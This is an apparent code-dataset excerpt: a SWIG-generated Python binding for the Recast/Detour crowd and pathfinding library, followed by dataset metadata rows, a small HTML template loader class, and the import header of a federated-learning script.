DT_CROWD_OBSTACLE_AVOIDANCE = _pyrecast.DT_CROWD_OBSTACLE_AVOIDANCE
DT_CROWD_SEPARATION = _pyrecast.DT_CROWD_SEPARATION
DT_CROWD_OPTIMIZE_VIS = _pyrecast.DT_CROWD_OPTIMIZE_VIS
DT_CROWD_OPTIMIZE_TOPO = _pyrecast.DT_CROWD_OPTIMIZE_TOPO
class dtCrowdAgentDebugInfo(_object):
    """SWIG-generated proxy for the C++ struct ``dtCrowdAgentDebugInfo``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentDebugInfo, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentDebugInfo, name)
    __repr__ = _swig_repr
    __swig_setmethods__["idx"] = _pyrecast.dtCrowdAgentDebugInfo_idx_set
    __swig_getmethods__["idx"] = _pyrecast.dtCrowdAgentDebugInfo_idx_get
    if _newclass:idx = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_idx_get, _pyrecast.dtCrowdAgentDebugInfo_idx_set)
    __swig_setmethods__["optStart"] = _pyrecast.dtCrowdAgentDebugInfo_optStart_set
    __swig_getmethods__["optStart"] = _pyrecast.dtCrowdAgentDebugInfo_optStart_get
    if _newclass:optStart = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_optStart_get, _pyrecast.dtCrowdAgentDebugInfo_optStart_set)
    __swig_setmethods__["optEnd"] = _pyrecast.dtCrowdAgentDebugInfo_optEnd_set
    __swig_getmethods__["optEnd"] = _pyrecast.dtCrowdAgentDebugInfo_optEnd_get
    if _newclass:optEnd = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_optEnd_get, _pyrecast.dtCrowdAgentDebugInfo_optEnd_set)
    __swig_setmethods__["vod"] = _pyrecast.dtCrowdAgentDebugInfo_vod_set
    __swig_getmethods__["vod"] = _pyrecast.dtCrowdAgentDebugInfo_vod_get
    if _newclass:vod = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_vod_get, _pyrecast.dtCrowdAgentDebugInfo_vod_set)
    def __init__(self):
        """Construct the underlying C++ dtCrowdAgentDebugInfo."""
        this = _pyrecast.new_dtCrowdAgentDebugInfo()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtCrowdAgentDebugInfo
    __del__ = lambda self : None;
dtCrowdAgentDebugInfo_swigregister = _pyrecast.dtCrowdAgentDebugInfo_swigregister
dtCrowdAgentDebugInfo_swigregister(dtCrowdAgentDebugInfo)
class dtCrowd(_object):
    """SWIG-generated proxy for the C++ class ``dtCrowd``.

    Every method is a thin forwarder to the matching ``_pyrecast.dtCrowd_*``
    C entry point.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowd, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtCrowd, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtCrowd."""
        this = _pyrecast.new_dtCrowd()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtCrowd
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtCrowd_init(self, *args)
    def setObstacleAvoidanceParams(self, *args): return _pyrecast.dtCrowd_setObstacleAvoidanceParams(self, *args)
    def getObstacleAvoidanceParams(self, *args): return _pyrecast.dtCrowd_getObstacleAvoidanceParams(self, *args)
    def getAgent(self, *args): return _pyrecast.dtCrowd_getAgent(self, *args)
    def getAgentCount(self): return _pyrecast.dtCrowd_getAgentCount(self)
    def addAgent(self, *args): return _pyrecast.dtCrowd_addAgent(self, *args)
    def updateAgentParameters(self, *args): return _pyrecast.dtCrowd_updateAgentParameters(self, *args)
    def removeAgent(self, *args): return _pyrecast.dtCrowd_removeAgent(self, *args)
    def requestMoveTarget(self, *args): return _pyrecast.dtCrowd_requestMoveTarget(self, *args)
    def requestMoveVelocity(self, *args): return _pyrecast.dtCrowd_requestMoveVelocity(self, *args)
    def resetMoveTarget(self, *args): return _pyrecast.dtCrowd_resetMoveTarget(self, *args)
    def getActiveAgents(self, *args): return _pyrecast.dtCrowd_getActiveAgents(self, *args)
    def update(self, *args): return _pyrecast.dtCrowd_update(self, *args)
    def getFilter(self): return _pyrecast.dtCrowd_getFilter(self)
    def getEditableFilter(self): return _pyrecast.dtCrowd_getEditableFilter(self)
    def getQueryExtents(self): return _pyrecast.dtCrowd_getQueryExtents(self)
    def getVelocitySampleCount(self): return _pyrecast.dtCrowd_getVelocitySampleCount(self)
    def getGrid(self): return _pyrecast.dtCrowd_getGrid(self)
    def getPathQueue(self): return _pyrecast.dtCrowd_getPathQueue(self)
    def getNavMeshQuery(self): return _pyrecast.dtCrowd_getNavMeshQuery(self)
dtCrowd_swigregister = _pyrecast.dtCrowd_swigregister
dtCrowd_swigregister(dtCrowd)
# Free functions: the Python defs are immediately rebound to the raw C
# entry points (standard SWIG output), so the defs never actually run.
def dtAllocCrowd():
  return _pyrecast.dtAllocCrowd()
dtAllocCrowd = _pyrecast.dtAllocCrowd
def dtFreeCrowd(*args):
  return _pyrecast.dtFreeCrowd(*args)
dtFreeCrowd = _pyrecast.dtFreeCrowd
class dtLocalBoundary(_object):
    """SWIG-generated proxy for the C++ class ``dtLocalBoundary``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtLocalBoundary, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtLocalBoundary, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtLocalBoundary."""
        this = _pyrecast.new_dtLocalBoundary()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtLocalBoundary
    __del__ = lambda self : None;
    def reset(self): return _pyrecast.dtLocalBoundary_reset(self)
    def update(self, *args): return _pyrecast.dtLocalBoundary_update(self, *args)
    def isValid(self, *args): return _pyrecast.dtLocalBoundary_isValid(self, *args)
    def getCenter(self): return _pyrecast.dtLocalBoundary_getCenter(self)
    def getSegmentCount(self): return _pyrecast.dtLocalBoundary_getSegmentCount(self)
    def getSegment(self, *args): return _pyrecast.dtLocalBoundary_getSegment(self, *args)
dtLocalBoundary_swigregister = _pyrecast.dtLocalBoundary_swigregister
dtLocalBoundary_swigregister(dtLocalBoundary)
class dtObstacleCircle(_object):
    """SWIG-generated proxy for the C++ struct ``dtObstacleCircle``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleCircle, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtObstacleCircle, name)
    __repr__ = _swig_repr
    __swig_setmethods__["p"] = _pyrecast.dtObstacleCircle_p_set
    __swig_getmethods__["p"] = _pyrecast.dtObstacleCircle_p_get
    if _newclass:p = _swig_property(_pyrecast.dtObstacleCircle_p_get, _pyrecast.dtObstacleCircle_p_set)
    __swig_setmethods__["vel"] = _pyrecast.dtObstacleCircle_vel_set
    __swig_getmethods__["vel"] = _pyrecast.dtObstacleCircle_vel_get
    if _newclass:vel = _swig_property(_pyrecast.dtObstacleCircle_vel_get, _pyrecast.dtObstacleCircle_vel_set)
    __swig_setmethods__["dvel"] = _pyrecast.dtObstacleCircle_dvel_set
    __swig_getmethods__["dvel"] = _pyrecast.dtObstacleCircle_dvel_get
    if _newclass:dvel = _swig_property(_pyrecast.dtObstacleCircle_dvel_get, _pyrecast.dtObstacleCircle_dvel_set)
    __swig_setmethods__["rad"] = _pyrecast.dtObstacleCircle_rad_set
    __swig_getmethods__["rad"] = _pyrecast.dtObstacleCircle_rad_get
    if _newclass:rad = _swig_property(_pyrecast.dtObstacleCircle_rad_get, _pyrecast.dtObstacleCircle_rad_set)
    __swig_setmethods__["dp"] = _pyrecast.dtObstacleCircle_dp_set
    __swig_getmethods__["dp"] = _pyrecast.dtObstacleCircle_dp_get
    if _newclass:dp = _swig_property(_pyrecast.dtObstacleCircle_dp_get, _pyrecast.dtObstacleCircle_dp_set)
    __swig_setmethods__["np"] = _pyrecast.dtObstacleCircle_np_set
    __swig_getmethods__["np"] = _pyrecast.dtObstacleCircle_np_get
    if _newclass:np = _swig_property(_pyrecast.dtObstacleCircle_np_get, _pyrecast.dtObstacleCircle_np_set)
    def __init__(self):
        """Construct the underlying C++ dtObstacleCircle."""
        this = _pyrecast.new_dtObstacleCircle()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtObstacleCircle
    __del__ = lambda self : None;
dtObstacleCircle_swigregister = _pyrecast.dtObstacleCircle_swigregister
dtObstacleCircle_swigregister(dtObstacleCircle)
class dtObstacleSegment(_object):
    """SWIG-generated proxy for the C++ struct ``dtObstacleSegment``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleSegment, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtObstacleSegment, name)
    __repr__ = _swig_repr
    __swig_setmethods__["p"] = _pyrecast.dtObstacleSegment_p_set
    __swig_getmethods__["p"] = _pyrecast.dtObstacleSegment_p_get
    if _newclass:p = _swig_property(_pyrecast.dtObstacleSegment_p_get, _pyrecast.dtObstacleSegment_p_set)
    __swig_setmethods__["q"] = _pyrecast.dtObstacleSegment_q_set
    __swig_getmethods__["q"] = _pyrecast.dtObstacleSegment_q_get
    if _newclass:q = _swig_property(_pyrecast.dtObstacleSegment_q_get, _pyrecast.dtObstacleSegment_q_set)
    __swig_setmethods__["touch"] = _pyrecast.dtObstacleSegment_touch_set
    __swig_getmethods__["touch"] = _pyrecast.dtObstacleSegment_touch_get
    if _newclass:touch = _swig_property(_pyrecast.dtObstacleSegment_touch_get, _pyrecast.dtObstacleSegment_touch_set)
    def __init__(self):
        """Construct the underlying C++ dtObstacleSegment."""
        this = _pyrecast.new_dtObstacleSegment()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtObstacleSegment
    __del__ = lambda self : None;
dtObstacleSegment_swigregister = _pyrecast.dtObstacleSegment_swigregister
dtObstacleSegment_swigregister(dtObstacleSegment)
class dtObstacleAvoidanceDebugData(_object):
    """SWIG-generated proxy for the C++ class ``dtObstacleAvoidanceDebugData``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceDebugData, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceDebugData, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtObstacleAvoidanceDebugData."""
        this = _pyrecast.new_dtObstacleAvoidanceDebugData()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceDebugData
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_init(self, *args)
    def reset(self): return _pyrecast.dtObstacleAvoidanceDebugData_reset(self)
    def addSample(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_addSample(self, *args)
    def normalizeSamples(self): return _pyrecast.dtObstacleAvoidanceDebugData_normalizeSamples(self)
    def getSampleCount(self): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCount(self)
    def getSampleVelocity(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleVelocity(self, *args)
    def getSampleSize(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleSize(self, *args)
    def getSamplePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSamplePenalty(self, *args)
    def getSampleDesiredVelocityPenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleDesiredVelocityPenalty(self, *args)
    def getSampleCurrentVelocityPenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCurrentVelocityPenalty(self, *args)
    def getSamplePreferredSidePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSamplePreferredSidePenalty(self, *args)
    def getSampleCollisionTimePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCollisionTimePenalty(self, *args)
dtObstacleAvoidanceDebugData_swigregister = _pyrecast.dtObstacleAvoidanceDebugData_swigregister
dtObstacleAvoidanceDebugData_swigregister(dtObstacleAvoidanceDebugData)
# Free functions: Python defs immediately rebound to the raw C entry points.
def dtAllocObstacleAvoidanceDebugData():
  return _pyrecast.dtAllocObstacleAvoidanceDebugData()
dtAllocObstacleAvoidanceDebugData = _pyrecast.dtAllocObstacleAvoidanceDebugData
def dtFreeObstacleAvoidanceDebugData(*args):
  return _pyrecast.dtFreeObstacleAvoidanceDebugData(*args)
dtFreeObstacleAvoidanceDebugData = _pyrecast.dtFreeObstacleAvoidanceDebugData
class dtObstacleAvoidanceParams(_object):
    """SWIG-generated proxy for the C++ struct ``dtObstacleAvoidanceParams``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceParams, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceParams, name)
    __repr__ = _swig_repr
    __swig_setmethods__["velBias"] = _pyrecast.dtObstacleAvoidanceParams_velBias_set
    __swig_getmethods__["velBias"] = _pyrecast.dtObstacleAvoidanceParams_velBias_get
    if _newclass:velBias = _swig_property(_pyrecast.dtObstacleAvoidanceParams_velBias_get, _pyrecast.dtObstacleAvoidanceParams_velBias_set)
    __swig_setmethods__["weightDesVel"] = _pyrecast.dtObstacleAvoidanceParams_weightDesVel_set
    __swig_getmethods__["weightDesVel"] = _pyrecast.dtObstacleAvoidanceParams_weightDesVel_get
    if _newclass:weightDesVel = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightDesVel_get, _pyrecast.dtObstacleAvoidanceParams_weightDesVel_set)
    __swig_setmethods__["weightCurVel"] = _pyrecast.dtObstacleAvoidanceParams_weightCurVel_set
    __swig_getmethods__["weightCurVel"] = _pyrecast.dtObstacleAvoidanceParams_weightCurVel_get
    if _newclass:weightCurVel = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightCurVel_get, _pyrecast.dtObstacleAvoidanceParams_weightCurVel_set)
    __swig_setmethods__["weightSide"] = _pyrecast.dtObstacleAvoidanceParams_weightSide_set
    __swig_getmethods__["weightSide"] = _pyrecast.dtObstacleAvoidanceParams_weightSide_get
    if _newclass:weightSide = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightSide_get, _pyrecast.dtObstacleAvoidanceParams_weightSide_set)
    __swig_setmethods__["weightToi"] = _pyrecast.dtObstacleAvoidanceParams_weightToi_set
    __swig_getmethods__["weightToi"] = _pyrecast.dtObstacleAvoidanceParams_weightToi_get
    if _newclass:weightToi = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightToi_get, _pyrecast.dtObstacleAvoidanceParams_weightToi_set)
    __swig_setmethods__["horizTime"] = _pyrecast.dtObstacleAvoidanceParams_horizTime_set
    __swig_getmethods__["horizTime"] = _pyrecast.dtObstacleAvoidanceParams_horizTime_get
    if _newclass:horizTime = _swig_property(_pyrecast.dtObstacleAvoidanceParams_horizTime_get, _pyrecast.dtObstacleAvoidanceParams_horizTime_set)
    __swig_setmethods__["gridSize"] = _pyrecast.dtObstacleAvoidanceParams_gridSize_set
    __swig_getmethods__["gridSize"] = _pyrecast.dtObstacleAvoidanceParams_gridSize_get
    if _newclass:gridSize = _swig_property(_pyrecast.dtObstacleAvoidanceParams_gridSize_get, _pyrecast.dtObstacleAvoidanceParams_gridSize_set)
    __swig_setmethods__["adaptiveDivs"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_set
    __swig_getmethods__["adaptiveDivs"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_get
    if _newclass:adaptiveDivs = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_set)
    __swig_setmethods__["adaptiveRings"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_set
    __swig_getmethods__["adaptiveRings"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_get
    if _newclass:adaptiveRings = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveRings_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_set)
    __swig_setmethods__["adaptiveDepth"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_set
    __swig_getmethods__["adaptiveDepth"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_get
    if _newclass:adaptiveDepth = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_set)
    def __init__(self):
        """Construct the underlying C++ dtObstacleAvoidanceParams."""
        this = _pyrecast.new_dtObstacleAvoidanceParams()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceParams
    __del__ = lambda self : None;
dtObstacleAvoidanceParams_swigregister = _pyrecast.dtObstacleAvoidanceParams_swigregister
dtObstacleAvoidanceParams_swigregister(dtObstacleAvoidanceParams)
# Module-level constants exported from the C global-variable table (cvar).
DT_MAX_PATTERN_DIVS = cvar.DT_MAX_PATTERN_DIVS
DT_MAX_PATTERN_RINGS = cvar.DT_MAX_PATTERN_RINGS
class dtObstacleAvoidanceQuery(_object):
    """SWIG-generated proxy for the C++ class ``dtObstacleAvoidanceQuery``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceQuery, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceQuery, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtObstacleAvoidanceQuery."""
        this = _pyrecast.new_dtObstacleAvoidanceQuery()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceQuery
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_init(self, *args)
    def reset(self): return _pyrecast.dtObstacleAvoidanceQuery_reset(self)
    def addCircle(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_addCircle(self, *args)
    def addSegment(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_addSegment(self, *args)
    def sampleVelocityGrid(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_sampleVelocityGrid(self, *args)
    def sampleVelocityAdaptive(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_sampleVelocityAdaptive(self, *args)
    def getObstacleCircleCount(self): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleCircleCount(self)
    def getObstacleCircle(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleCircle(self, *args)
    def getObstacleSegmentCount(self): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleSegmentCount(self)
    def getObstacleSegment(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleSegment(self, *args)
dtObstacleAvoidanceQuery_swigregister = _pyrecast.dtObstacleAvoidanceQuery_swigregister
dtObstacleAvoidanceQuery_swigregister(dtObstacleAvoidanceQuery)
# Free functions: Python defs immediately rebound to the raw C entry points.
def dtAllocObstacleAvoidanceQuery():
  return _pyrecast.dtAllocObstacleAvoidanceQuery()
dtAllocObstacleAvoidanceQuery = _pyrecast.dtAllocObstacleAvoidanceQuery
def dtFreeObstacleAvoidanceQuery(*args):
  return _pyrecast.dtFreeObstacleAvoidanceQuery(*args)
dtFreeObstacleAvoidanceQuery = _pyrecast.dtFreeObstacleAvoidanceQuery
class dtPathCorridor(_object):
    """SWIG-generated proxy for the C++ class ``dtPathCorridor``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtPathCorridor, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtPathCorridor, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtPathCorridor."""
        this = _pyrecast.new_dtPathCorridor()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtPathCorridor
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtPathCorridor_init(self, *args)
    def reset(self, *args): return _pyrecast.dtPathCorridor_reset(self, *args)
    def findCorners(self, *args): return _pyrecast.dtPathCorridor_findCorners(self, *args)
    def optimizePathVisibility(self, *args): return _pyrecast.dtPathCorridor_optimizePathVisibility(self, *args)
    def optimizePathTopology(self, *args): return _pyrecast.dtPathCorridor_optimizePathTopology(self, *args)
    def moveOverOffmeshConnection(self, *args): return _pyrecast.dtPathCorridor_moveOverOffmeshConnection(self, *args)
    def fixPathStart(self, *args): return _pyrecast.dtPathCorridor_fixPathStart(self, *args)
    def trimInvalidPath(self, *args): return _pyrecast.dtPathCorridor_trimInvalidPath(self, *args)
    def isValid(self, *args): return _pyrecast.dtPathCorridor_isValid(self, *args)
    def movePosition(self, *args): return _pyrecast.dtPathCorridor_movePosition(self, *args)
    def moveTargetPosition(self, *args): return _pyrecast.dtPathCorridor_moveTargetPosition(self, *args)
    def setCorridor(self, *args): return _pyrecast.dtPathCorridor_setCorridor(self, *args)
    def getPos(self): return _pyrecast.dtPathCorridor_getPos(self)
    def getTarget(self): return _pyrecast.dtPathCorridor_getTarget(self)
    def getFirstPoly(self): return _pyrecast.dtPathCorridor_getFirstPoly(self)
    def getLastPoly(self): return _pyrecast.dtPathCorridor_getLastPoly(self)
    def getPath(self): return _pyrecast.dtPathCorridor_getPath(self)
    def getPathCount(self): return _pyrecast.dtPathCorridor_getPathCount(self)
dtPathCorridor_swigregister = _pyrecast.dtPathCorridor_swigregister
dtPathCorridor_swigregister(dtPathCorridor)
# Free functions: Python defs immediately rebound to the raw C entry points.
def dtMergeCorridorStartMoved(*args):
  return _pyrecast.dtMergeCorridorStartMoved(*args)
dtMergeCorridorStartMoved = _pyrecast.dtMergeCorridorStartMoved
def dtMergeCorridorEndMoved(*args):
  return _pyrecast.dtMergeCorridorEndMoved(*args)
dtMergeCorridorEndMoved = _pyrecast.dtMergeCorridorEndMoved
def dtMergeCorridorStartShortcut(*args):
  return _pyrecast.dtMergeCorridorStartShortcut(*args)
dtMergeCorridorStartShortcut = _pyrecast.dtMergeCorridorStartShortcut
class dtPathQueue(_object):
    """SWIG-generated proxy for the C++ class ``dtPathQueue``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtPathQueue, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtPathQueue, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtPathQueue."""
        this = _pyrecast.new_dtPathQueue()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtPathQueue
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtPathQueue_init(self, *args)
    def update(self, *args): return _pyrecast.dtPathQueue_update(self, *args)
    def request(self, *args): return _pyrecast.dtPathQueue_request(self, *args)
    def getRequestStatus(self, *args): return _pyrecast.dtPathQueue_getRequestStatus(self, *args)
    def getPathResult(self, *args): return _pyrecast.dtPathQueue_getPathResult(self, *args)
    def getNavQuery(self): return _pyrecast.dtPathQueue_getNavQuery(self)
dtPathQueue_swigregister = _pyrecast.dtPathQueue_swigregister
dtPathQueue_swigregister(dtPathQueue)
# Constant exported from the C global-variable table (cvar).
DT_PATHQ_INVALID = cvar.DT_PATHQ_INVALID
class dtProximityGrid(_object):
    """SWIG-generated proxy for the C++ class ``dtProximityGrid``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtProximityGrid, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtProximityGrid, name)
    __repr__ = _swig_repr
    def __init__(self):
        """Construct the underlying C++ dtProximityGrid."""
        this = _pyrecast.new_dtProximityGrid()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtProximityGrid
    __del__ = lambda self : None;
    def init(self, *args): return _pyrecast.dtProximityGrid_init(self, *args)
    def clear(self): return _pyrecast.dtProximityGrid_clear(self)
    def addItem(self, *args): return _pyrecast.dtProximityGrid_addItem(self, *args)
    def queryItems(self, *args): return _pyrecast.dtProximityGrid_queryItems(self, *args)
    def getItemCountAt(self, *args): return _pyrecast.dtProximityGrid_getItemCountAt(self, *args)
    def getBounds(self): return _pyrecast.dtProximityGrid_getBounds(self)
    def getCellSize(self): return _pyrecast.dtProximityGrid_getCellSize(self)
dtProximityGrid_swigregister = _pyrecast.dtProximityGrid_swigregister
dtProximityGrid_swigregister(dtProximityGrid)
# Free functions: Python defs immediately rebound to the raw C entry points.
def dtAllocProximityGrid():
  return _pyrecast.dtAllocProximityGrid()
dtAllocProximityGrid = _pyrecast.dtAllocProximityGrid
def dtFreeProximityGrid(*args):
  return _pyrecast.dtFreeProximityGrid(*args)
dtFreeProximityGrid = _pyrecast.dtFreeProximityGrid
# SWIG "cpointer" helpers: allocate, free, and index raw C arrays of
# primitive types (unsigned short, unsigned char, unsigned int, int, float).
# As with the other free functions, each Python def is immediately rebound
# to the corresponding raw C entry point.
def new_ushortp(*args):
  return _pyrecast.new_ushortp(*args)
new_ushortp = _pyrecast.new_ushortp
def delete_ushortp(*args):
  return _pyrecast.delete_ushortp(*args)
delete_ushortp = _pyrecast.delete_ushortp
def ushortp_getitem(*args):
  return _pyrecast.ushortp_getitem(*args)
ushortp_getitem = _pyrecast.ushortp_getitem
def ushortp_setitem(*args):
  return _pyrecast.ushortp_setitem(*args)
ushortp_setitem = _pyrecast.ushortp_setitem
def new_ucharp(*args):
  return _pyrecast.new_ucharp(*args)
new_ucharp = _pyrecast.new_ucharp
def delete_ucharp(*args):
  return _pyrecast.delete_ucharp(*args)
delete_ucharp = _pyrecast.delete_ucharp
def ucharp_getitem(*args):
  return _pyrecast.ucharp_getitem(*args)
ucharp_getitem = _pyrecast.ucharp_getitem
def ucharp_setitem(*args):
  return _pyrecast.ucharp_setitem(*args)
ucharp_setitem = _pyrecast.ucharp_setitem
def new_uintp(*args):
  return _pyrecast.new_uintp(*args)
new_uintp = _pyrecast.new_uintp
def delete_uintp(*args):
  return _pyrecast.delete_uintp(*args)
delete_uintp = _pyrecast.delete_uintp
def uintp_getitem(*args):
  return _pyrecast.uintp_getitem(*args)
uintp_getitem = _pyrecast.uintp_getitem
def uintp_setitem(*args):
  return _pyrecast.uintp_setitem(*args)
uintp_setitem = _pyrecast.uintp_setitem
def new_intp(*args):
  return _pyrecast.new_intp(*args)
new_intp = _pyrecast.new_intp
def delete_intp(*args):
  return _pyrecast.delete_intp(*args)
delete_intp = _pyrecast.delete_intp
def intp_getitem(*args):
  return _pyrecast.intp_getitem(*args)
intp_getitem = _pyrecast.intp_getitem
def intp_setitem(*args):
  return _pyrecast.intp_setitem(*args)
intp_setitem = _pyrecast.intp_setitem
def new_floatp(*args):
  return _pyrecast.new_floatp(*args)
new_floatp = _pyrecast.new_floatp
def delete_floatp(*args):
  return _pyrecast.delete_floatp(*args)
delete_floatp = _pyrecast.delete_floatp
def floatp_getitem(*args):
  return _pyrecast.floatp_getitem(*args)
floatp_getitem = _pyrecast.floatp_getitem
def floatp_setitem(*args):
  return _pyrecast.floatp_setitem(*args)
floatp_setitem = _pyrecast.floatp_setitem
# This file is compatible with both classic and new-style classes.
| 60.407497 | 167 | 0.815041 |
e5cad4e4204fa021d670502ddc4dc4cbeb04e7a2 | 196 | py | Python | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null |
class HTML_Template:
    """Load an HTML template from disk and serve its contents.

    The file is read once at construction time and cached in ``self.html``.
    """

    def __init__(self, template_path):
        """Read the template file at *template_path* into memory.

        Fix: the original opened the file without ever closing it; a context
        manager now guarantees the handle is released.
        """
        with open(template_path, 'r') as template_file:
            self.html = template_file.read()

    def generate_html(self):
        """Return the raw HTML of the loaded template."""
        return self.html
833bd2faa9769a377a4dd3945e61b22dfd55e226 | 33,954 | py | Python | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED, FIRST_COMPLETED,as_completed
import threading
import time
import numpy as np
import tensorflow as tf
import math
import random
import copy
from Helper_Functions import Vname_to_FeedPname, Vname_to_Pname, check_validaity_of_FLAGS, create_save_dir, \
global_step_creator, load_from_directory_or_initialize, bring_Accountant_up_to_date, save_progress, \
save_progress_K_model, load_from_directory_or_initialize_K_model, WeightsAccountant, print_loss_and_accuracy, \
print_new_comm_round, PrivAgent, Flag
